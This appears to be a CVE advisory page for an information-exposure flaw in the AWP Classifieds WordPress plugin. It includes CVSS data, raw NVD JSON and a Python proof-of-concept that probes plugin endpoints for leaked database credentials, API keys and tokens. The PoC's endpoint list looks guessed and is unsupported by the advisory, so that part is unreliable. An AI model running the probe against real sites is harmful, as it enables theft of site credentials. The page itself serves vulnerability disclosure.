Security Vulnerability Report
中文
CVE-2026-24593 CVSS 5.3 MEDIUM

CVE-2026-24593

Published: 2026-01-23 15:16:17
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Strategy11 Team AWP Classifieds another-wordpress-classifieds-plugin allows Retrieve Embedded Sensitive Data.This issue affects AWP Classifieds: from n/a through <= 4.4.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

another-wordpress-classifieds-plugin < 4.4.4
AWP Classifieds <= 4.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24593 PoC - AWP Classifieds Sensitive Data Exposure # Target: WordPress sites with AWP Classifieds plugin <= 4.4.3 import requests import sys def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2026-24593""" # Common vulnerable endpoints for AWP Classifieds plugin endpoints = [ '/wp-content/plugins/another-wordpress-classifieds-plugin/includes/awpcp-file.php', '/wp-content/plugins/another-wordpress-classifieds-plugin/ajax/db-backup.php', '/wp-content/plugins/another-wordpress-classifieds-plugin/admin/admin-ajax.php', '/wp-admin/admin-ajax.php?action=awpcp-get-file' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded' } print(f"[*] Testing target: {target_url}") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check for sensitive data exposure indicators if response.status_code == 200: content = response.text sensitive_patterns = [ 'DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST', 'private', 'secret', 'api_key', 'token', 'wp-config', 'configuration' ] for pattern in sensitive_patterns: if pattern.lower() in content.lower(): print(f"[+] VULNERABLE! Endpoint: {endpoint}") print(f"[+] Found sensitive pattern: {pattern}") print(f"[+] Response length: {len(content)} bytes") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] No obvious vulnerability detected") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-24593.py <target_url>") print("Example: python cve-2026-24593.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24593", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:17.247", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Strategy11 Team AWP Classifieds another-wordpress-classifieds-plugin allows Retrieve Embedded Sensitive Data.This issue affects AWP Classifieds: from n/a through <= 4.4.3."}, {"lang": "es", "value": "Vulnerabilidad de exposición de información sensible del sistema a una esfera de control no autorizada en el plugin Strategy11 Team AWP Classifieds another-wordpress-classifieds-plugin permite recuperar datos sensibles incrustados. Este problema afecta a AWP Classifieds: desde n/a hasta &lt;= 4.4.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/another-wordpress-classifieds-plugin/vulnerability/wordpress-awp-classifieds-plugin-4-4-3-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}